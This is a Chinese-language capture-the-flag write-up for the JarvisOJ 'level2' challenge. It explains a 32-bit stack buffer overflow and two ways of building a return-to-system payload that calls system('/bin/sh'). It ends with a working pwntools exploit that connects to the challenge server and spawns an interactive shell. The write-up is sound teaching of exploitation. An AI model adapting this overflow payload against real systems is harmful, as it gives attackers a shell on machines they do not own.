关于这个level2,在网上找到了两种解法,放在一起分析了一下。
首先查看题目基本信息:
程序开启了栈不可执行保护。
IDA查看反汇编代码:
可以看到存在栈溢出,并且程序调用了system函数。
所以我们的思路就是构造vulnerable_function()的buf变量,使得:返回地址被覆盖为system函数的地址,构造system函数的栈帧,并为system传递参数’/bin/sh’。
先说第一种payload1的构造:
a*0x88(buf)+a*4(ebp)+system地址+构造的任意的system函数返回地址+’/bin/sh’字符串的地址(system函数的参数)
我们从payload分析原理
填充buf后:
当 vulnerable 函数执行到返回地址出栈时,即 pop 出 system_addr 程序跳转到system函数时,栈顶为我们构造的xxxxx(无效的system返回地址),紧接着就是’/bin/sh’的地址。来看此时的栈分布,就相当于调用了system(‘/bin/sh’)。
此时的栈帧结构符合正常调用system函数的栈帧结构(只有返回地址,这也就是为什么要构造一个无效的返回地址),所以system可以正常执行。
也就是说我们完成了system函数栈帧的构造
第二种payload构造:
a*0x88(buf)+a*4(ebp)+call_system地址+’/bin/sh’字符串的地址(system函数的参数)
call_system地址是指从main函数(或者其他函数)调用system函数的那条指令的地址。
还是从 vulnerable_function执行完说起,最后一条指令ret 执行完后,system地址出栈,程序跳转到call system那一条指令处。此时栈的情况:栈顶为’/bin/sh’的地址。与第一种情况相比少了一个构造的任意返回地址。
当执行call system函数时,又会向栈中压入一个返回地址,就是call system的下一条指令的地址。所以说call 指令完成了payload1中的构造任意返回地址。
附上最终的代码:
from pwn import *
context(log_level = "debug",arch = "i386",os = "linux")
ip = 'pwn2.jarvisoj.com'
port = '9878'
io = remote(ip,port)
padding = 0x8C * 'A'
bin_sh_addr = 0x0804A024
system_addr=0x08048320
call_system_addr = 0x0804849E
payload = padding + p32(call_system_addr) + p32(bin_sh_addr)
payload = padding + p32(system_addr) + p32(1) + p32(bin_sh_addr)
io.recvuntil('Input:')
io.sendline(payload)
io.interactive()
参考链接:
https://www.freebuf.com/column/183879.html
https://blog.csdn.net/qq_35661990/article/details/83902369
https://www.cnblogs.com/WangAoBo/p/7622091.html
文章同步到我的博客:http://www.zjzhhb.com/archives/627